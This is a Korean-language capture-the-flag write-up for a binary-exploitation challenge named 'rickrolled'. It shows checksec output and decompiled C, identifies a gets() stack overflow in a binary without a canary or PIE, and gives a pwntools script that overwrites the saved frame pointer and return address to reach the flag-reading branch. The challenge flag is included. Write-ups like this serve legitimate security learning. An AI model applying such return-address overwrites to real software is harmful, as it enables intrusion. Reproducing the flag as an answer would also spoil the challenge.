# Description
Just a program that rickrolls whoever runs it.
Author: omelette_keychain
Plain Text
복사
# 분석
Checksec
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
SHSTK: Enabled
IBT: Enabled
Stripped: No
Plain Text
복사
핵심 부분만 보자 v0, v8, v7가 특정 값으로 변경되어야 실행된다.
__int64 v0; // r11
__int64 v1; // r13
__int64 v2; // r15
char s[48]; // [rsp+0h] [rbp-60h] BYREF
char v5[16]; // [rsp+30h] [rbp-30h] BYREF
FILE *stream; // [rsp+40h] [rbp-20h]
__int64 v7; // [rsp+48h] [rbp-18h]
__int64 v8; // [rsp+50h] [rbp-10h]
__int64 v9; // [rsp+58h] [rbp-8h]
if ( v0 == 0xBEEFDEADLL && v8 == 2880290543LL && v7 == 3735928493LL )
{
stream = fopen("flag.txt", "r");
if ( !stream )
printf("Error in opening the flag file. Flag file might be missing.");
fgets(s, 46, stream);
puts("\nHere is your flag: \n");
puts(s);
exit(0);
}
puts("Hello. What a plesant day! I am definitly not planning anything evil. :>");
puts("Do you have anything to say to me?");
gets(v5);
puts("Your last words are: ");
puts(v5);
puts("Now prepare for the worst!");
C
복사
하지만 gets에서 StackOverFlow 취약점이 존재한다.
ret을 조작해서 원하는 부분을 실행할 수 있으며 보호기법은 NO PIE, No Canary 임으로 원하는 binary의 함수를 실행할 수 있다.
ret을 steam = fopen(”flag.txt”, “r”) 부분으로 조작하면 문제가 풀리며, 여기서 fopen의 결과인 steam은 rbp-0x20 임으로, sfp를 bss 영역으로 옮겨준다.
# Payload
#!/usr/bin/env python3.12
'''
author: JangJongMin
time: 2025-07-28 10:19:04
'''
from pwn import *
filename = "rickrolled_patched"
libcname = "/home/ubuntu/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1".strip()
port = 1337
elf = context.binary = ELF(filename)
context.terminal = ['tmux', 'neww']
if libcname:
libc = ELF(libcname)
gs = '''
set debug-file-directory /home/ubuntu/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/ubuntu/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
set $pie_base=$_base("rickrolled_patched")
b *0x4014b6
c
'''
def start():
if args.GDB:
return gdb.debug(elf.path, gdbscript = gs)
elif args.REMOTE:
return remote(host, port)
else:
return process(elf.path)
def log(str_, hex_):
success(f"{str_} : {hex(hex_)}")
def DEPTR(ptr):
_12bits = []
dec = 0
while ptr != 0:
_12bits.append(ptr & 0xfff)
ptr = ptr >> 12
x = _12bits.pop()
while len(_12bits) > 0:
dec |= x
dec <<= 12
y = _12bits.pop()
x = x ^ y
dec |= x
return dec
def ENPTR(pos, ptr):
return (pos >> 12) ^ (ptr)
p = start()
s = p.send
sf = p.sendafter
sl = p.sendline
slf = p.sendlineafter
r = p.recv
ru = p.recvuntil
rl = p.recvline
payload = b"A"*0x30
payload += p64(elf.bss() + 0x100) + p64(0x40125A)
slf("me?", payload)
p.interactive()
Python
복사
# Flag
shakticon25{r0p_cH@!n_n3v3r_gOnna_let_u_dowN}
Plain Text
복사